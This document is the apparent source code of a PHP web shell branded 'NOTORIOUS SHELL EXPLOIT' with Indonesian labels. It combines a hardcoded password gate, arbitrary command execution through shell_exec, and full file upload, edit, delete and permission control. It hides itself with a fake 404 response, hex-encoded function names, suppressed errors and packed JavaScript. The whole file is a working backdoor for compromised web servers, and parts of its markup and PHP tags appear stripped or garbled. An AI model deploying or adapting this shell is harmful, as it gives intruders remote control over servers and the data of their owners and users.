session_start();

if(isset($_POST['password']) && $_POST['password'] === 'pler1121') {
$_SESSION['authenticated'] = true;
}

if(!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
echo "
<!DOCTYPE html>


NOTORIOUS SHELL EXPLOIT <title>NOTORIOUS SHELL EXPLOIT</title>


<style>
body {
margin: 0;
padding: 0;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
background: url('https://i.pinimg.com/originals/f5/f2/74/f5f27448c036af645c27467c789ad759.gif') no-repeat center center fixed;
background-size: cover;
color: white;
font-family: Arial, sans-serif;
}

form {
background: transparent;
padding: 20px;
border-radius: 10px;
}

label {
display: block;
margin-bottom: 10px;
}

input {
width: 100%;
padding: 10px;
margin-bottom: 15px;
box-sizing: border-box;
border: 2px solid #000000;
border-radius: 5px;
background-color: transparent;
color: black;
text-align: center;
}

input[type=\"submit\"] {
color: white;
cursor: pointer;
}

input[type=\"submit\"]:hover {
background-color: #000000;
}
input[type=\"password\"]:hover {
background-color: #000000;
}
</style>



NOTORIOUS TEAM SHELL BRAY!


<input type='password' name='password'>
<input type='submit' value='Jebolkan!'>


";
exit;
}
error_reporting(0);
ini_set('display_errors', 0);
ignore_user_abort(true);
set_time_limit(0);
http_response_code(404);
$G3 = "scandir";
$c8 = [
"7068705f756e616d65",
"70687076657273696f6e",
"676574637764",
"6368646972",
"707265675f73706c6974",
"61727261795f64696666",
"69735f646972",
"69735f66696c65",
"69735f7772697461626c65",
"69735f7265616461626c65",
"66696c6573697a65",
"636f7079",
"66696c655f657869737473",
"66696c655f7075745f636f6e74656e7473",
"66696c655f6765745f636f6e74656e7473",
"6d6b646972",
"72656e616d65",
"737472746f74696d65",
"68746d6c7370656369616c6368617273",
"64617465",
"66696c656d74696d65",
];
$lE = 0;
T4:
if (!($lE < count($c8))) {
goto Je;
}
$c8[$lE] = JD($c8[$lE]);
Cy:
$lE++;
goto T4;
Je:
if (isset($_GET["p"])) {
goto sr;
}
$Jd = $c8[2]();
goto VN;
sr:
$Jd = jD($_GET["p"]);
$c8[3](Jd($_GET["p"]));
VN:
function Ss($SP)
{
$dE = "";
$lE = 0;
NZ:
if (!($lE < strlen($SP))) {
goto Xc;
}
$dE .= dechex(ord($SP[$lE]));
WK:
$lE++;
goto NZ;
Xc:
return $dE;
}
function Jd($SP)
{
$dE = "";
$gf = strlen($SP) - 1;
$lE = 0;
Xp:
if (!($lE < $gf)) {
goto ur;
}
$dE .= chr(hexdec($SP[$lE] . $SP[$lE + 1]));
Wn:
$lE += 2;
goto Xp;
ur:
return $dE;
}
function rn($F1)
{
$Jd = fileperms($F1);
if (($Jd & 0xc000) == 0xc000) {
goto FZ;
}
if (($Jd & 0xa000) == 0xa000) {
goto Eu;
}
if (($Jd & 0x8000) == 0x8000) {
goto ES;
}
if (($Jd & 0x6000) == 0x6000) {
goto sA;
}
if (($Jd & 0x4000) == 0x4000) {
goto lG;
}
if (($Jd & 0x2000) == 0x2000) {
goto tV;
}
if (($Jd & 0x1000) == 0x1000) {
goto Tx;
}
$lE = "u";
goto cC;
FZ:
$lE = "s";
goto cC;
Eu:
$lE = "l";
goto cC;
ES:
$lE = "-";
goto cC;
sA:
$lE = "b";
goto cC;
lG:
$lE = "d";
goto cC;
tV:
$lE = "c";
goto cC;
Tx:
$lE = "p";
cC:
$lE .= $Jd & 0x100 ? "r" : "-";
$lE .= $Jd & 0x80 ? "w" : "-";
$lE .= $Jd & 0x40 ? ($Jd & 0x800 ? "s" : "x") : ($Jd & 0x800 ? "S" : "-");
$lE .= $Jd & 0x20 ? "r" : "-";
$lE .= $Jd & 0x10 ? "w" : "-";
$lE .= $Jd & 0x8 ? ($Jd & 0x400 ? "s" : "x") : ($Jd & 0x400 ? "S" : "-");
$lE .= $Jd & 0x4 ? "r" : "-";
$lE .= $Jd & 0x2 ? "w" : "-";
$lE .= $Jd & 0x1 ? ($Jd & 0x200 ? "t" : "x") : ($Jd & 0x200 ? "T" : "-");
return $lE;
}
function Xe($OB, $Ch = 1, $BL = "")
{
global $Jd;
$xe = $Ch == 1 ? "success" : "error";
echo "<script>swal({title: \"{$xe}\", text: \"{$OB}\", icon: \"{$xe}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=" .
Ss($Jd) .
$BL .
"\"}})</script>";
}
function tF($yf)
{
global $c8;
if (!(trim(pathinfo($yf, PATHINFO_BASENAME), ".") === "")) {
goto IE;
}
return;
IE:
if (is_dir($yf) && array_diff(scandir($yf), array('.', '..'))) {
goto PF;
}
rmdir($yf);
return;
PF:
array_map(
function($item) use ($yf) {
$file = $yf . DIRECTORY_SEPARATOR . $item;
if (is_dir($file)) {
tF($file);
} else {
unlink($file);
}
},
array_diff(scandir($yf), array('.', '..'))
);
rmdir($yf);
}

<!DOCTYPE html>
<html lang="en">

<meta property="og:image" content="//res.cloudinary.com/ddkldtlwq/image/upload/v1725647241/favicon_bb983db6-7439-44b1-8c54-3a49f6fbcee1_1723809570427_piombf.png">
<meta property="og:title" content="fahx7nonexec Di mari boss">
<meta property="og:description" content="fahx7nonexec seo 303">
<meta name="theme-color" content="#ff0000">
<meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no">
fahx7nonexec Di mari boss <title>fahx7nonexec Di mari boss</title>
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="icon" href="//res.cloudinary.com/ddkldtlwq/image/upload/v1725647241/favicon_bb983db6-7439-44b1-8c54-3a49f6fbcee1_1723809570427_piombf.png">
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Amaranth:ital,wght@0,400;0,700;1,400;1,700&display=swap');
@import url('https://fonts.googleapis.com/css2?family=Rock+Salt&display=swap');
body {
color: black;
font-size: 0px;
font-family: 'Amaranth';
width: 99%;
padding: 0px;
margin-right: auto;
margin-left: auto;
margin-top: 7px;
margin-bottom: 7px;
background-color: black!important;
}

.bg-dark {
background-color: black!important;
}

.border {
box-shadow: 0px 0px 10px #ff0000;
border: 2px solid #ff0000!important;
border-radius: 5px;
background: transparent;
}

.border:hover {
box-shadow: 0px 0px 10px #ff0000;
border: 2px solid #ff0000!important;
}

.table td {
padding: 0.1rem;
box-shadow: inset 0px 0px 0px 1px #ff0000;
border-radius: 2px;
}

.table thead th {
font-family: 'Amaranth', cursive;
box-shadow: inset 0px 0px 0px 1.5px #ff0000;
color: #ff0000;
padding: 0.25rem;
border-radius: 5px;
background: linear-gradient(to bottom, black, #3f3f3f80);
}

.table-hover tbody tr:hover td {
background: #3f3f3f80;
box-shadow: inset 0px 0px 0px 1px #ff0000;
border-radius: 2px;
}

.table-hover tbody tr:hover td>* {
}

.table>tbody>tr>* {
color:#fff;
vertical-align:middle;
}

.form-control {
background:0 0!important;
color:#fff!important;
border-radius:0;
}

.form-control::placeholder {
color:#fff;
opacity:1;
}

.form-group {
margin-top: .3rem;
margin-bottom: .3rem;
}

li {
font-size:large!important;
color: #ff0000!important;
list-style: inherit!important;
}

a {
color: #ffffff;
text-decoration: none!important;
}

a:hover {
text-decoration: none!important;
color: #ff0000;
animation: kedip 1s linear infinite;
}

h5 {
margin-top: 1.5px;
margin-bottom: 1.5px;
color: #ff0000!important;
padding: 2px;
}

textarea {
width: 97%;
font-size: medium!important;
font-family: inherit;
height: 44vh;
padding-left: 5px;
}

button, input {
border: 2px solid #ff0000;
border-radius: 5px;
font-size: 15px;
color:white;
line-height: normal;
font-family: inherit;
}

button, input:hover {
border: 2px solid #ff0000;
cursor: pointer;
}

.ohct {
padding-left: 1rem;
padding-right: 1rem;
color: white;
border: 2px solid #ff0000;
border-radius: 5px;
background-color: transparent;
font-family: inherit;
font-size: 16px;
}

.ohct:hover {
border: 2px solid #ff0000;
color: #ff0000!important;
}

.combet {
color: white;
}

.combet:hover {
color: #ff0000;
}

.p-1 {
padding: 4px;
}

::selection {
color: black;
background: silver;
}

.fa {
padding: 10px;
font-size: 20px;
width: 50px;
text-align: center;
text-decoration: none;
margin: 5px;
color: #ff0000;
}

.fa:hover {
border: 2px solid #ff0000;
}

.text-light {
color: #f8f9fa!important;
font-size: large!important;
}

.kedip {
animation: kedip 1s linear infinite;
}

@keyframes kedip {
0% {
color: #ff0000;
}
50% {
color: white;
}
100% {
color: #ff0000;
}
}

@keyframes rainbowBorder {
0% {
border-image: linear-gradient(to right, #ff0000, magenta) 1;
}
14% {
border-image: linear-gradient(to right, magenta, lime) 1;
}
28% {
border-image: linear-gradient(to right, lime, yellow) 1;
}
42% {
border-image: linear-gradient(to right, yellow, orange) 1;
}
57% {
border-image: linear-gradient(to right, orange, red) 1;
}
71% {
border-image: linear-gradient(to right, red, pink) 1;
}
85% {
border-image: linear-gradient(to right, pink, #ff0000) 1;
}
100% {
border-image: linear-gradient(to right, #ff0000, magenta) 1;
}
}

.rainbow-border {
border: 2px solid red;
border-radius: 5px!important;
animation: rainbowBorder 2s linear infinite;
}
@keyframes rainbowText {
0% {
color: #ff0000;
}
14% {
color: magenta;
}
28% {
color: lime;
}
42% {
color: yellow;
}
57% {
color: orange;
}
71% {
color: red;
}
85% {
color: pink;
}
100% {
color: #ff0000;
}
}
.rainbow-text {
animation: rainbowText 2s infinite;
font-weight: bold;
}
</style>
<script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script>


<div class="table-responsive text-light rainbow-border" style="text-align: left;padding: 4px;">
<div style="text-align: center;display: flex;align-items: center;justify-content: center;align-content: center;">
<a href="?" style="font-size: 1.5rem;padding: 0.5rem;"><span class="rainbow-text" style="font-family:Rock Salt">fahx7nonexec Was Here</span></a>
</div>
<li>Your IP : <span style="color: white;"> echo gethostbyname(
$_SERVER["REMOTE_ADDR"]
); </span></li>
<li>Server IP : <span style="color: white;"> echo gethostbyname(
$_SERVER["SERVER_NAME"]
); </span></li>
<li>Server : <span style="color: white;"> echo Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64; </span></li>
<li>Server Software : <span style="color: white;"> echo $_SERVER[
"SERVER_SOFTWARE"
]; </span></li>
<li>PHP Version : <span style="color: white;"> echo phpversion(); </span></li>
<li><a href="?p== ss($Jd) .
"&a=" .
Ss("newFile") " class="ohct">Buat File</a> | <a href="?p== Ss($Jd) .
"&a=" .
sS("newDir") " class="ohct">Buat Folder</a></li>





if (isset($_POST['submit'])) {
if (isset($_FILES['f']['name']) && count($_FILES['f']['name']) > 0) {
foreach ($_FILES['f']['name'] as $key => $fileName) {
$tmpFilePath = $_FILES['f']['tmp_name'][$key];
if ($tmpFilePath != "") {
$newFilePath = getcwd() . DIRECTORY_SEPARATOR . $fileName;
if (move_uploaded_file($tmpFilePath, $newFilePath)) {
xe("File berhasil diunggah.");
} else {
Xe("Gagal mengunggah file.");
}
}
}
} else {
Xe("Tidak ada file yang diunggah.");
}
}


<div class="form-group">

<button type="submit" name="run_command" class="ohct">Eksekusi</button>
</div>



if (isset($_POST['run_command'])) {
$command = $_POST['command'];
if (!empty($command)) {
$output = shell_exec($command); // Menjalankan command
} else {
$output = "Command tidak boleh kosong.";
}


<div class="form-group">
<textarea cols="30" rows="5" class="form-control rainbow-border" readonly> echo htmlspecialchars($output); </textarea>
</div>


}

</div>
<div class="table-responsive text-light rainbow-border" style="text-align: left;padding: 4px;margin-bottom: 3px;margin-top: 3px;">
<li>Dir : <span>
$Op = $c8[4]("/(\\\\|\\/)/", $Jd);
foreach ($Op as $j3 => $Oe) {
if (!($j3 == 0 && $Oe == "")) {
goto xi;
}
echo "<a href=\"?p=2f\" class=\"combet\">~</a>/";
goto CS;
xi:
if (!($Oe == "")) {
goto sq;
}
goto CS;
sq:
echo "<a class=\"combet\" href=\"?p=";
$lE = 0;
de:
if (!($lE <= $j3)) {
goto ie;
}
echo sS($Op[$lE]);
if (!($lE != $j3)) {
goto s0;
}
echo "2f";
s0:
dg:
$lE++;
goto de;
ie:
echo "\">{$Oe}</a>/";
CS:
}
Go:

</span></li></div>
<div class="table-responsive text-light" style="text-align: center;font-family: inherit;font-size: large;">

if (!isset($_GET["a"])) {
goto Un;
}
if (!isset($_GET["a"])) {
goto cc;
}
$im = Jd($_GET["a"]);
cc:


$Jd = getcwd();
if ($im == "delete") {
$BL = $Jd . "/" . jd($_GET["n"]);

if ($_GET["t"] == "d") {
tF($BL);

if (!file_exists($BL)) {
xe("folder deleted successfully");
} else {
Xe("failed to delete the folder", 0);
}
}

if ($_GET["t"] == "f") {
unlink($BL);

if (!file_exists($BL)) {
xe("file deleted successfully");
} else {
Xe("failed to delete the file", 0);
}
}
} else {
Lu:
}


if ($im == "newDir") {
goto Fg;
}
if ($im == "newFile") {
goto Pb;
}
if ($im == "rename") {
goto Lw;
}
if ($im == "edit") {
goto Ox;
}
if ($im == "changePerms") {
goto Ch;
}
if ($im == "view") {
goto Ag;
}
goto WC;
Fg:

<h5 class="p-1 rainbow-border" style="text-align: center;">Nama Folder Baru :</h5>

<div class="form-group">
<input name="folder_name" id="folder_name" class="border p-1" autocomplete="off" style="text-align: center;">
</div>
<div class="form-group" style="margin-top: 10px;">
<button type="submit" name="create_folder" class="ohct">Create</button>
</div>



if (isset($_POST["create_folder"])) {
$folderName = basename($_POST["folder_name"]);
$currentDir = getcwd();
$folderPath = "{$currentDir}/{$folderName}";

if (file_exists($folderPath)) {
xE("Nama folder telah digunakan", 0, "&a=" . SS("newDir"));
} else {
if (mkdir($folderPath)) {
xe("Folder berhasil dibuat");
} else {
Xe("Folder gagal dibuat", 0);
}
}
}
goto WC;
Pb:

<h5 class="p-1 rainbow-border" style="text-align: center;">Nama File Baru :</h5>

<div class="form-group">

</div>
<div class="form-group">
<textarea style="resize:none" name="file_content" id="file_content" cols="30" rows="10" class="form-control rainbow-border"></textarea>
</div>
<div class="form-group" style="margin-top: 10px;">
<button type="submit" name="create_file" class="ohct">Create</button>
</div>


if (isset($_POST["create_file"])) {
$fileName = basename($_POST["new_file_name"]);
$content = $_POST["file_content"];

$currentDir = getcwd();
$filePath = "{$currentDir}/{$fileName}";

if (file_put_contents($filePath, $content)) {
xe("File berhasil dibuat", 1, "&a=" . SS("view") . "&n=" . Ss($fileName));
} else {
xE("File gagal dibuat", 0);
}
}
goto WC;
Lw:

<h5 class="p-1 rainbow-border">Rename File : = jD($_GET["n"]) </h5>

<div class="form-group">

</div>
<div class="form-group" style="margin-top: 10px;">
<button type="submit" name="rename_file" class="ohct">Save</button>
</div>



if (isset($_POST["rename_file"])) {
$newName = basename($_POST["new_file_name"]);
$currentDir = getcwd();
$oldPath = "{$currentDir}/" . jD($_GET["n"]);
$newPath = "{$currentDir}/{$newName}";

if (rename($oldPath, $newPath)) {
xe("Berhasil mengubah nama file");
} else {
Xe("Gagal mengubah nama file", 0);
}
}
goto WC;
Ox:

<h5 class="p-1 rainbow-border" style="text-align: center;">Edit Nama File: <font color="white">= htmlspecialchars(jD($_GET["n"])) </font></h5>

<div class="form-group">
<textarea name="file_content" id="file_content" cols="30" rows="10" class="form-control rainbow-border">= htmlspecialchars(file_get_contents(getcwd() . "/" . jD($_GET["n"]))) </textarea>
</div>
<div class="form-group" style="margin-top: 10px;">
<button type="submit" name="mengedit_file" class="ohct">Simpan</button>
</div>


if (isset($_GET['n'])) {
$fileName = jD($_GET['n']);
$filePath = getcwd() . DIRECTORY_SEPARATOR . $fileName;
if (isset($_POST['mengedit_file'])) {
$newContent = $_POST['file_content'];
if (file_put_contents($filePath, $newContent)) {
xe("File berhasil disimpan.");
} else {
Xe("Gagal menyimpan file.");
}
}
}
goto WC;
Ch:

<h5 class="p-1 rainbow-border">Ubah Izin : = jD($_GET["n"]) </h5>

<div class="form-group">

$F1 = jD($_GET["n"]);
$currentPermissions = substr(sprintf('%o', fileperms($F1)), -4);


</div>
<div class="form-group" style="margin-top: 10px;">
<button type="submit" name="change_perms" class="ohct">Ubah Izin</button>
</div>



if (isset($_POST["change_perms"])) {
$newPerms = $_POST["new_permissions"];
$currentDir = getcwd();
$filePath = "{$currentDir}/" . jD($_GET["n"]);

if (chmod($filePath, octdec($newPerms))) {
xe("Berhasil mengubah izin");
} else {
Xe("Gagal mengubah izin", 0);
}
}
goto WC;
Ag:

<h5 class="p-1 rainbow-border" style="text-align: center;">
View File Name : <font color="white">= htmlspecialchars(jD($_GET["n"])); </font>
</h5>
<div class="form-group">
<textarea name="file_content" id="file_content" cols="30" rows="10" class="form-control rainbow-border" readonly>= $c8[18]($c8[14](getcwd() . "/" . jd($_GET["n"]))) </textarea>
</div>
WC:
</div>

goto mR;
Un:

<table class="table table-hover table-borderless table-sm" style="text-align: center;width: 100%;">
<thead class="text-light">

<th style="width: 45%;">Name</th>
<th style="width: 13%;">Size</th>
<th style="width: 13%;">Permission</th>
<th colspan="3">Action</th>

</thead>
<tbody class="text-light">
$G3 = $c8[5]($G3($Jd), [".", ".."]);
foreach ($G3 as $yf) {
if ($c8[6]("{$Jd}/{$yf}")) {
goto CB;
}
goto Qj;
CB:
echo "

<td style=\"text-align: left;\">
<i class=\"fa fa-fw fa-folder-o\" style=\"border: 0;padding: 0;width: 1.28571429em;\"></i><a href=\"?p=" .
sS("{$Jd}/{$yf}") .
"\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " .
$c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$yf}")) .
"\">{$yf}</a>
<td style=\"color: black;\"><span></span>

<a href=\"?p=" .
sS($Jd) .
"&a=" .
sS("changePerms") .
"&n=" .
sS($yf) .
"\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Change Permissions\" data-original-title=\"Change Permissions\"><font color=\"" .
($c8[8]("{$Jd}/{$yf}")
? "#00ff00"
: (!$c8[9]("{$Jd}/{$yf}")
? "#ff0000"
: null)) .
"\">" .
RN("{$Jd}/{$yf}") .
"</font></a>

<td style=\"color: black;width: 9.5%;\"><span></span>

<a href=\"?p=" .
ss($Jd) .
"&a=" .
ss("rename") .
"&n=" .
ss($yf) .
"&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\">Rename</a>


<a href=\"?p=" .
sS($Jd) .
"&a=" .
ss("delete") .
"&n=" .
ss($yf) .
"\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\">Delete</a>

";
Qj:
}
ad:
foreach ($G3 as $F1) {
if ($c8[7]("{$Jd}/{$F1}")) {
goto wA;
}
goto X1;
wA:
$kL = $c8[10]("{$Jd}/{$F1}") / 1024;
$kL = round($kL, 3);
$kL = $kL > 1024 ? round($kL / 1024, 2) . " MB" : $kL . " KB";
echo "

<td style=\"text-align: left;\">
<i class=\"fa fa-fw fa-file-o\" style=\"border: 0;padding: 0;width: 1.28571429em;\"></i><a href=\"?p=" .
SS($Jd) .
"&a=" .
sS("view") .
"&n=" .
SS($F1) .
"\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on " .
$c8[19]("Y-m-d H:i", $c8[20]("{$Jd}/{$F1}")) .
"\">{$F1}</a>
<span>{$kL}</span>

<a href=\"?p=" .
SS($Jd) .
"&a=" .
sS("changePerms") .
"&n=" .
SS($F1) .
"\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Change Permissions\" data-original-title=\"Change Permissions\"><font color=\"" .
($c8[8]("{$Jd}/{$F1}")
? "#00ff00"
: (!$c8[9]("{$Jd}/{$F1}")
? "#ff0000"
: null)) .
"\">" .
rN("{$Jd}/{$F1}") .
"</font></a>

<a href=\"?p=" .
Ss($Jd) .
"&a=" .
Ss("edit") .
"&n=" .
SS($F1) .
"\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\">Edit</a>
<a href=\"?p=" .
ss($Jd) .
"&a=" .
SS("rename") .
"&n=" .
ss($F1) .
"&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\">Raename</a>
<a href=\"?p=" .
ss($Jd) .
"&a=" .
sS("delete") .
"&n=" .
ss($F1) .
"\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\">Delete</a>
";
X1:
}
a2:

</tbody>

mR:
</div>
<script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script>
<script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script>